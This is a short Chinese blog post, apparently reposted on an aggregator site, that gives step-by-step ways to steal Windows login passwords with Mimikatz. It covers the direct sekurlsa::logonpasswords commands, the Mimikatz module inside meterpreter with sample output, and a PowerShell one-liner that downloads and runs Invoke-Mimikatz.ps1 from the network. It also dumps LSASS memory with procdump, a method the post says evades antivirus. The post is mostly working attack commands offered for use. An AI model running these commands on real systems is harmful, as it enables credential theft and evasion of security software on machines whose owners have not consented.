使用Mimikatz读取密码

Posted 懒惰不懒

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了使用Mimikatz读取密码相关的知识,希望对你有一定的参考价值。

 法一:

  https://github.com/gentilkiwi/mimikatz/releases/tag/2.1.1-20170813

  

 

第一条:privilege::debug    //提升权限
第二条:sekurlsa::logonpasswords      //抓取密码

 

 

 

注:请以管理员权限!!!

  (什么?要管理员权限!有管理员权限了还要你干嘛....)

 

法二:

  meterreter下已集成了mimikata

  

meterpreter > load mimikatz

meterpreter > wdigest 
[!] Not currently running as SYSTEM
[*] Attempting to getprivs
[+] Got SeDebugPrivilege
[*] Retrieving wdigest credentials
wdigest credentials

 

 

法三:

  powershell IEX (New-Object Net.WebClient).DownloadString(\'https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1\'); Invoke-Mimikatz

 当出现目标机器不能上网的时候也可以就近搭个web服务 然后下载ps1....

 

另一种方法是procdump结合Mimikatz。

好处:免杀

 

NT6可以使用自带的提取功能

 

 

mimikatz # sekurlsa::minidump hellolsass.dmp
Switch to MINIDUMP
 
mimikatz # sekurlsa::logonPasswords full

 

注:这种需要在目标环境系统与本地mimikatz的运行品台兼容。

以上是关于使用Mimikatz读取密码的主要内容,如果未能解决你的问题,请参考以下文章

Mimikatz获取系统密码***研究

安全-内网渗透中mimikatz使用方法

[工具]法国神器mimikatz 2.1.1 一键版 & PowerShell版

源码阅读Mimikatz一键获取远程终端凭据与获取明文密码

mimikatz抓取密码

如何防御“神器”Mimikatz窃取系统密码?